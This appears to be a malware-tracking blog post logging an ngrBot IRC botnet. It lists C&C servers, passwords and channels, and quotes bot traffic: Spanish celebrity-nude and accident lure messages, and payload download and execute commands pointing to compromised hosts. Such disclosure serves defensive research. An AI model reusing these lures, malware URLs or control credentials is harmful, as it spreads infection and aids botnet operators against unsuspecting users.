lalorlz1.info(ngrBot hosted in Germany Weinstadt Hetzner Online Ag)

Resolved : [lalorlz1.info] To [88.198.181.16]
Resolved : [lalorlz1.info] To [176.9.192.216]
rlz1jmv.info not active

C&C Server: 88.198.181.16:5236 PASS ROCKR
Server Password:
Username: raecpnp
Nickname: n{DE|XPa}raecpnp
Channel: #ROCK (Password: ngrBot)
Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s

PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira a miley cyrus desnuda y dopada en un hotel http://www.aceinfosys.co.kr//bbs/data/IMG00359268.JPG se malogro demasiado |”
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira a miley cyrus desnuda y dopada en un hotel http://www.aceinfosys.co.kr//bbs/data/IMG00359268.JPG se malogro demasiado”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 16 domain(s)
PRIVMSG #ROCK :[d=”http://www.aceinfosys.co.kr//bbs/data/list/extfud.exe” s=”94220 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0
NICK n{US|XPa}wvkzwrb
USER wvkzwrb 0 0 :wvkzwrb
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “5”
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “5 |”

UPDATE:
C&C Server: 173.208.175.132:5236
Server Password:
Username: unxrbhq
Nickname: n{DE|XPa}unxrbhq
Channel: #ROCK (Password: ngrBot)
Channeltopic: :,up http://www.aceinfosys.co.kr//bbs/data/update/35upjmrlzz.exe F1985D1913D99CABAA6988FC44F96362 | ,mdns http://www.aceinfosys.co.kr//bbs/data/update/di.txt | ,dl http://www.aceinfosys.co.kr//bbs/data/list/extfud.exe | ,j #rockspread | ,s

173.208.175.154 5236 PASS ROCKR

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://www.aceinfosys.co.kr//bbs/data/IMG00359268.JPG asu esta buenaza |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://www.aceinfosys.co.kr//bbs/data/IMG00359268.JPG asu esta buenaza”
PRIVMSG #ROCK :[d=”http://www.aceinfosys.co.kr//bbs/data/update/36upjmrlzz.exe” s=”116236 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 16 domain(s)
NICK n{US|XPa}vjqggtw
USER vjqggtw 0 0 :vjqggtw
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “5”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “5”

UPDATE:

Remote Host Port Number
173.208.175.174 5236 PASS ROCKR

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira este video de jlo desnuda http://37.59.93.152/IMG00359268.JPG asu q tal cuerpo |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira este video de jlo desnuda http://37.59.93.152/IMG00359268.JPG asu q tal cuerpo”
PRIVMSG #ROCK :[d=”http://myscenespace.ca/_pay/paypal/41upjmrlzz.exe” s=”142351 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 4 domain(s)
NICK n{US|XPa}cehvwfr
USER cehvwfr 0 0 :cehvwfr
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “4”

update:
Resolved : [lalorlz1.info] To [8.33.7.136]

8.33.7.136 5236 PASS ROCKR

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “Luis Fonsi sufrio accidente al salir de concierto en vi
a del mar mira la foto http://37.59.93.152/IMG00359268.JPG |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “Luis Fonsi sufrio accidente al salir de concierto en vi
a del mar mira la foto http://37.59.93.152/IMG00359268.JPG”
PRIVMSG #ROCK :[d=”http://www.jdkim.com//bbs/data/updt/44upjmrlzz.exe” s=”116236 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 4 domain(s)
NICK n{US|XPa}monwpww
USER monwpww 0 0 :monwpww
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “4”

hosting infos:
http://whois.domaintools.com/88.198.181.16

Categories: Uncategorized